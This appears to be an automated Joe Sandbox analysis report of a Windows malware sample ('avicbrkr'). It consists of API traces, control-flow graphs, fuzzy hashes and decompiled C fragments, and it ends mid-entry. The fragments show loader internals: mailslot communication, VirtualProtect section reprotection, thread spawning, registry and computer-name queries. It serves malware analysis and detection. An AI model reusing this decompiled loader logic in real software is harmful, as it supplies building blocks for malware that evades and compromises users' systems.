                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction ID: d23dc2a85cadddd41d6abb100f9dc413ece9bb957419d815b73429d736441217
                      • Opcode Fuzzy Hash: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction Fuzzy Hash: 9D214A70D01358EBDB109F95CE88A9EBBB8FB44351F108076E641B22A0D7B48A84DA58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 207 3879cc-3879e9 call 395c00 call 387774 212 3879eb-3879ed 207->212 213 3879f2-387a00 call 3877a0 207->213 214 387b34-387b39 call 395c3b 212->214 219 387b31 213->219 220 387a06-387a0e 213->220 219->214 221 387a10 220->221 222 387a13-387a2f call 38a1bf 220->222 221->222 225 387a4c-387a61 VirtualProtect 222->225 226 387a31-387a46 call 38a265 222->226 228 387aef-387af8 GetLastError 225->228 229 387a67-387a6e 225->229 226->225 234 387afa 226->234 233 387b01-387b29 228->233 231 387a70-387a74 229->231 232 387a77-387aa2 VirtualProtect 229->232 231->232 235 387aad-387ae9 RtlEnterCriticalSection RtlLeaveCriticalSection 232->235 236 387aa4-387aa8 call 38783a 232->236 233->219 240 387b2b-387b2c call 3712ff 233->240 234->233 235->233 239 387aeb-387aed 235->239 236->235 239->233 240->219
                      APIs
                        • Part of subcall function 003877A0: GetLastError.KERNEL32(00000024,?,003879FB,00000000,00000000,00399550,00000014,003881BE,?,00000000,?,?,00000000,0039C828,00000000), ref: 003877CD
                        • Part of subcall function 0038A1BF: lstrcmpi.KERNEL32(?,00000000), ref: 0038A1F4
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00399550,00000014,003881BE,?,00000000,?), ref: 00387A59
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,0037B5E2), ref: 00387A93
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ADA
                        • Part of subcall function 0038783A: lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387ABC
                      • GetLastError.KERNEL32(?,0037B5E2), ref: 00387AEF
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038A265: lstrcmpi.KERNEL32(?,00000000), ref: 0038A2A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$CriticalErrorLastSectionlstrcmpi$EnterFreeHeapLeavelstrlen
                      • String ID: H}*
                      • API String ID: 1219094055-3236088583
                      • Opcode ID: d4787955ec77940077ef61f9b6cd6b27f148e7615201abc845d32ec0fdd6f5b0
                      • Instruction ID: 61bec83853cc1424f1af1a349819b66bc3e323936fcd64de170e1e510a41dc56
                      • Opcode Fuzzy Hash: d4787955ec77940077ef61f9b6cd6b27f148e7615201abc845d32ec0fdd6f5b0
                      • Instruction Fuzzy Hash: C3416A71904709EFDB13EF65C885BADBBBABF04310F2181A5E9149B251D774EA40CFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 242 388461-38849b lstrcpyn call 38a536 245 3884a1-3884a6 242->245 246 388556 242->246 248 3884ac-3884b0 245->248 249 38854d-388554 245->249 247 38855d-388564 246->247 248->249 250 3884b6-3884e4 VirtualAlloc 248->250 249->247 251 388544-38854b 250->251 252 3884e6-38851a call 3820d9 250->252 251->247 255 38851c-38852b memcpy 252->255 256 38852d 252->256 257 388534-388542 VirtualFree 255->257 256->257 257->247
                      APIs
                      • lstrcpyn.KERNEL32(00000000,003994A4,00000008), ref: 00388486
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 003884DA
                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,?,00000001), ref: 00388523
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000001), ref: 0038853C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
                      • String ID: Feb 28 2019$pnls$pnls
                      • API String ID: 2133416149-3706025122
                      • Opcode ID: 13d11c992a9b8a5ad22942ef3626a522f3bc962a2ff6660602a1210ef424bef8
                      • Instruction ID: 73777bd5cacc1fec08d90e0566eb44f9985500e180ec2494996654fdd6aa4e0a
                      • Opcode Fuzzy Hash: 13d11c992a9b8a5ad22942ef3626a522f3bc962a2ff6660602a1210ef424bef8
                      • Instruction Fuzzy Hash: CD310B72900304EBDF02EFA8C845B9E7775FF46704F548499E9056F286CB71DA05CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 270 631096-6310a5 271 631107-631114 InterlockedDecrement 270->271 272 6310a7-6310a8 270->272 273 631157-63115c 271->273 275 631116-63111c 271->275 272->273 274 6310ae-6310bb InterlockedIncrement 272->274 274->273 276 6310c1-6310d5 HeapCreate 274->276 277 63114b-631151 HeapDestroy 275->277 278 63111e-63111f 275->278 279 631103-631105 276->279 280 6310d7-631101 call 631000 CreateThread 276->280 277->273 281 631124-631135 SleepEx 278->281 279->273 280->273 280->279 283 631137-63113c 281->283 284 63113e-63114a CloseHandle 281->284 283->281 283->284 284->277
                      APIs
                      • InterlockedIncrement.KERNEL32(006375C8), ref: 006310B3
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 006310C8
                        • Part of subcall function 00631000: memcpy.NTDLL(006376E0,?,0000000C,00636240,0000000C,006310EC,?,00000000,?), ref: 0063103B
                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000005E,00000000,?,00000000), ref: 006310F4
                      • InterlockedDecrement.KERNEL32(006375C8), ref: 0063110C
                      • SleepEx.KERNEL32(00000064,00000001), ref: 00631128
                      • CloseHandle.KERNEL32 ref: 00631144
                      • HeapDestroy.KERNEL32 ref: 00631151
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThreadmemcpy
                      • String ID:
                      • API String ID: 820571241-0
                      • Opcode ID: 6a3a94c73a2aa233a839d591f244ced6e92b9d2335bd368b2ea39171ecf1377d
                      • Instruction ID: ceed142d0c2053d0532ae87e84e5aa73ff9d8bdba6e6c4eb749f47b197d5e176
                      • Opcode Fuzzy Hash: 6a3a94c73a2aa233a839d591f244ced6e92b9d2335bd368b2ea39171ecf1377d
                      • Instruction Fuzzy Hash: 9211E776605215BFCB345F28ED8AADA7BABFB07B65F009025F605C6360CB709810CAE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 286 401033-40105a CreateMailslotA 288 4010d6-4010df GetLastError 286->288 289 40105c-401066 call 4011f2 286->289 290 4010e2-4010e6 288->290 295 4010c4 289->295 296 401068-40107e ReadFile 289->296 292 4010f1-4010f8 290->292 293 4010e8-4010ee 290->293 293->292 297 4010cb-4010d4 CloseHandle 295->297 298 401080-40109c RtlReAllocateHeap 296->298 299 4010a4-4010b0 GetLastError 296->299 297->290 298->295 301 40109e-4010a2 298->301 299->297 300 4010b2 299->300 302 4010b5-4010c0 Sleep 300->302 301->302 302->296 303 4010c2 302->303 303->297
                      C-Code - Quality: 96%
                      			E00401033(void* _a4) {
                      				signed int _v8;
                      				long _v12;
                      				long _v16;
                      				void* _v20;
                      				void* _t24;
                      				long _t25;
                      				void* _t27;
                      				int _t32;
                      				long _t33;
                      				void* _t34;
                      				void* _t36;
                      				long _t39;
                      
                      				_pop(_t41);
                      				_t39 = 0;
                      				_v8 = 0x1000;
                      				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
                      				_v16 = _t24;
                      				if(_t24 == 0) {
                      					_t25 = GetLastError();
                      					_t36 = _a4;
                      					_v8 = _t25;
                      				} else {
                      					_t36 = E004011F2(0x1000);
                      					if(_t36 == 0) {
                      						L10:
                      						_v8 = 8;
                      					} else {
                      						do {
                      							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
                      							if(_t32 == 0) {
                      								_t33 = GetLastError();
                      								_v8 = _t33;
                      								if(_t33 == 0x79) {
                      									_v16 = 0x1000;
                      									goto L8;
                      								}
                      							} else {
                      								_v12 = _v12 + 0x1000;
                      								_t39 = _t39 + _v16;
                      								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t36, _v12); // executed
                      								_t36 = _t34;
                      								if(_t36 == 0) {
                      									goto L10;
                      								} else {
                      									_v8 = _v8 & 0x00000000;
                      									goto L8;
                      								}
                      							}
                      							goto L11;
                      							L8:
                      							Sleep(0x64); // executed
                      						} while (_v16 == 0x1000);
                      					}
                      					L11:
                      					CloseHandle(_v20);
                      				}
                      				if(_v8 == 0) {
                      					_t27 = _a4;
                      					 *(_t27 + 4) = _t36;
                      					 *((intOrPtr*)(_t27 + 8)) = _t39;
                      				}
                      				return _v8;
                      			}
                      0x00401033
                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction ID: 301bfff34d3d9a42d24819e7bb6be00bc8a8a456f07860fe6218443ba64bb720
                      • Opcode Fuzzy Hash: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction Fuzzy Hash: D3116A31901358ABDB219F95CD88BAFBBB8FB44750F108077F640B21E0D7B48980CA68
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 304 634365-6343a6 lstrcpyn 305 6343aa-6343af 304->305 306 6343b1-6343b7 305->306 307 6343bb-6343bf 305->307 306->307 310 6343b9 306->310 308 6343c1-6343c3 307->308 309 6343c5-6343c7 307->309 308->305 308->309 311 634482 309->311 312 6343cd-6343d2 309->312 310->307 315 634489-634490 311->315 313 634479-634480 312->313 314 6343d8-6343dc 312->314 313->315 314->313 316 6343e2-634410 VirtualAlloc 314->316 317 634412-634446 call 634b60 316->317 318 634470-634477 316->318 321 634459 317->321 322 634448-634457 memcpy 317->322 318->315 323 634460-63446e VirtualFree 321->323 322->323 323->315
                      APIs
                      • lstrcpyn.KERNEL32(006316FE,006361F4,00000008,0063618C,0000000C,00000000,?,?,?,006316FE,?,?,00637614), ref: 00634393
                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,006316FE,?,?,00637614), ref: 00634406
                      • memcpy.NTDLL(?,00000000,?,?,00637614,00000001,?,?,?,006316FE,?,?,00637614), ref: 0063444F
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00637614,00000001,?,?,?,006316FE,?), ref: 00634468
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
                      • String ID: Feb 28 2019$pnls
                      • API String ID: 2133416149-2933827253
                      • Opcode ID: 92552fb2a81f15a17927731af388391fc6f011fac4eaefb6f2899d1c2aa5eae7
                      • Instruction ID: 08cfedec2e88140137f796a21a7c0f4d4fe3553f7438b821c4e0d71f059e3cbf
                      • Opcode Fuzzy Hash: 92552fb2a81f15a17927731af388391fc6f011fac4eaefb6f2899d1c2aa5eae7
                      • Instruction Fuzzy Hash: 9B316071A00214ABDF14DF99C885BAEFBB6FF44714F148069EA01AB356CBB4E945CBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 324 373f05-373f3c call 373da8 327 373fa3-373faa 324->327 328 373f3e-373f5b RegQueryValueExA 324->328 329 373fd5-373fdc 327->329 330 373fac-373fb6 327->330 331 373f62-373f6e call 38f3b0 328->331 332 373f5d-373f60 328->332 335 374020-374027 329->335 336 373fde-373fe9 call 3712ea 329->336 333 373fcb 330->333 334 373fb8-373fc9 call 373eac 330->334 337 373f6f-373f79 331->337 332->331 332->337 333->329 334->329 334->333 347 373feb-374017 wsprintfA 336->347 348 37401a 336->348 339 373f7b-373f97 337->339 340 373f9a-373f9d RegCloseKey 337->340 339->340 340->327 347->348 348->335
                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • RegQueryValueExA.KERNEL32(?,Client,00000000,?,0039C06C,0000005C,00000001,?,00000000,00000000,00000000,?,00000001,0037D9E0,?,0000005C), ref: 00373F50
                        • Part of subcall function 0038F3B0: RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F3ED
                        • Part of subcall function 0038F3B0: HeapFree.KERNEL32(00000000,?), ref: 0038F423
                        • Part of subcall function 0038F3B0: GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F431
                        • Part of subcall function 0038F3B0: RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F448
                        • Part of subcall function 0038F3B0: GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F459
                        • Part of subcall function 0038F3B0: HeapFree.KERNEL32(00000000,00000000), ref: 0038F47F
                      • RegCloseKey.ADVAPI32(?,?,00000001,0037D9E0,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00373F9D
                      • wsprintfA.USER32 ref: 00374011
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Allocate$CloseComputerFreeName$CreateOpenQueryValuelstrlenwsprintf
                      • String ID: Client
                      • API String ID: 3310993741-3236430179
                      • Opcode ID: 0a9487a24d686c2ba6a67fec9c5c8bba0bb52d04a6528501abc3c36688fcd35d
                      • Instruction ID: 2c1e85b3e23481d0d88e56dfffc2a8b1bb68d0236670d0216339e02ac27f4486
                      • Opcode Fuzzy Hash: 0a9487a24d686c2ba6a67fec9c5c8bba0bb52d04a6528501abc3c36688fcd35d
                      • Instruction Fuzzy Hash: ED316D71910208EFEB239F99DC49BAE7BBCEB04B10F019156F908E6290D7769A408F60
                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                      • HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                      • RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateFreeOpenQueryValuelstrlen
                      • String ID:
                      • API String ID: 2305150588-0
                      • Opcode ID: 6d6e8ae5c9eb421624f4654d8896f59805ca335135f62f7f7208fcbb841930ea
                      • Instruction ID: 1db8bb7fbc323362f5592b25c46bfdd44d4058c6bb97a0424a733254e406bd4d
                      • Opcode Fuzzy Hash: 6d6e8ae5c9eb421624f4654d8896f59805ca335135f62f7f7208fcbb841930ea
                      • Instruction Fuzzy Hash: 801128B3510109FFDB129F94DC89CAE7B7EFB88354B114426F90593220E7769E51AB60
                      C-Code - Quality: 100%
                      			_entry_() {
                      				void* _t2;
                      				long _t3;
                      				long _t4;
                      
                      				_t4 = GetModuleHandleA(0); // executed
                      				_t2 = HeapCreate(0, 0x10000, 0); // executed
                      				if(_t2 == 0) {
                      					_t3 = GetLastError();
                      				} else {
                      					_t3 = E00401649(_t2, _t4); // executed
                      				}
                      				ExitThread(_t3);
                      			}


                      APIs
                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
                      • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
                      • GetLastError.KERNEL32 ref: 00401026
                      • ExitThread.KERNEL32 ref: 0040102D
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 00401649: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401700
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401714
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorExitHandleLast$CloseCodeObjectSingleWait$HeapModuleTerminate
                      • String ID:
                      • API String ID: 1018212157-0
                      • Opcode ID: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction ID: d49e082437a9ef023ccd0a11086753c1fee01878f1312c092d0fc4a9b36bd46a
                      • Opcode Fuzzy Hash: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction Fuzzy Hash: E2D0C735640310A7F6212BB15F4DB4B3918AF04789F144531F745F50E0CAF94440C66D

                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 56c0fb666169165849a03f5a0064763a04edfeef9294ff25eed876853fa60885
                      • Instruction ID: d520488bd1e4f50ea10e9bf1dd855d38af9aed1c6fecfd3df1139310a72e7534
                      • Opcode Fuzzy Hash: 56c0fb666169165849a03f5a0064763a04edfeef9294ff25eed876853fa60885
                      • Instruction Fuzzy Hash: D461BBB4E047189FCB14CF99C984A9DFBF1BF88300F11896AE858AB355D774A985CF81

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000000,0037D9CC,?,pnls,?,00000001,0037D9CC), ref: 0037D786
                        • Part of subcall function 00374EA4: HeapFree.KERNEL32(00000000,0037D7B1,00000000), ref: 00374F14
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037D7E6
                        • Part of subcall function 0038A7A2: memcpy.NTDLL(?,3BF08B00,A11674F3,A11674F4,00000000,00000000,00000000), ref: 0038A892
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapTime$FileSystemmemcpy
                      • String ID: pnls
                      • API String ID: 7926421-141991303
                      • Opcode ID: c5b06e94176a8a815048368481ff4f15b058d94838a316e29a2df43f494eebde
                      • Instruction ID: c5bda3202328fcc9873596fbb790ed7ffbbec611fb4d587dfe97f50e22ee8e4f
                      • Opcode Fuzzy Hash: c5b06e94176a8a815048368481ff4f15b058d94838a316e29a2df43f494eebde
                      • Instruction Fuzzy Hash: 3611E8B6800208FBDF12EBA4DD46ADE77BCEF08301F104452A605E6161DB36AA049BA1

                      C-Code - Quality: 82%
                      			E00401495(void* __eax, void* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				long _v16;
                      				signed int _v20;
                      				signed int _t31;
                      				long _t33;
                      				int _t34;
                      				signed int _t35;
                      				signed int _t42;
                      				void* _t50;
                      				void* _t51;
                      				signed int _t54;
                      
                      				_v12 = _v12 & 0x00000000;
                      				_t42 =  *(__eax + 6) & 0x0000ffff;
                      				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                      				_v20 = _t42;
                      				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                      				_v8 = _v8 & 0x00000000;
                      				if(_t42 <= 0) {
                      					L11:
                      					return _v12;
                      				}
                      				_t51 = _t50 + 0x24;
                      				while(1) {
                      					_t54 = _v12;
                      					if(_t54 != 0) {
                      						goto L11;
                      					}
                      					asm("bt dword [esi], 0x1d");
                      					if(_t54 >= 0) {
                      						asm("bt dword [esi], 0x1e");
                      						if(__eflags >= 0) {
                      							_t33 = 4;
                      						} else {
                      							asm("bt dword [esi], 0x1f");
                      							_t35 = 0;
                      							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                      						}
                      					} else {
                      						asm("bt dword [esi], 0x1f");
                      						asm("sbb eax, eax");
                      						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                      					}
                      					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                      					if(_t34 == 0) {
                      						_v12 = GetLastError();
                      					}
                      					_t51 = _t51 + 0x28;
                      					_v8 = _v8 + 1;
                      					_t31 = _v8;
                      					if(_t31 < _v20) {
                      						continue;
                      					} else {
                      						goto L11;
                      					}
                      				}
                      				goto L11;
                      			}


                      APIs
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                      • GetLastError.KERNEL32 ref: 00401521
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$ErrorLast
                      • String ID:
                      • API String ID: 1469625949-0
                      • Opcode ID: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction ID: 09eb7866679b6c449c64175da2a2ea58a88de491138e230cfb810df5d0af35aa
                      • Opcode Fuzzy Hash: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction Fuzzy Hash: 6E21C672900209EFEB208F94CC80FBEB7B4FB50355F10446AE541AB1A1D3749A85DB54

                      APIs
                      • lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
